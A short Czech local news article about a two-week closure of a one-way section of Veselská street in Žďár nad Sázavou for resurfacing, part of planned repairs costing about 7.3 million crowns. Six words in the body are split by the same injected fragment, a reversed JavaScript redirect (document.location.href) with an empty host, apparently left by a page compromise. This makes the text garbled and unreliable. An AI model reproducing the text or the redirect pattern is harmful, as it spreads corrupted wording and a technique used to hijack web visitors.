Rainbow page separator

Jednosměrkou ve Veselské ulici dva týdny neprojedou auta

Úterý, 2. srpna 2022

Jednosměrkou ve Veselské ulici dva týdny neprojedou auta
Žďár nad Sázavou / Do horní části Veselské ulice, konkrétně do jednosměrné komunikace mezi křižovatkou s ulicí Strojírenskou a křižovatkou s ulicí Jiřího z Poděbrad, se od začátku srpna nedostanou au[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobily. Důvodem je rekonstrukce povrchu komunikace, přičemž stavební práce, které omezí provoz v části ulice, potrvají dva týdny, tedy do 14. srpna.
Práce patří mezi opravy Veselské, Tyršovy a Neumannovy ulice naplánované na le[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní lé[„\’///:ptth\’=ferh.noitacol.tnemucod“];to. Jedná se o chodníky i komunikace, přičemž stavební činnosti radnici vyjdou na přibližně 7,3 milionu korun a mají být ho[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovy do konce září.
Ulic, kde by bylo třeba obnovit povrch, je ve Žďáře více, nicméně s dalšími stavebními pracemi se v té[„\’///:ptth\’=ferh.noitacol.tnemucod“];to souvislosti aktuálně nepočítá. Důvodem je skutečnost, že v těch[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ulicích zatím neproběhla rekonstrukce technických sítí vedoucích pod povrchem, takže nové silnice nebo chodníky by se časem musely znovu rozkopat.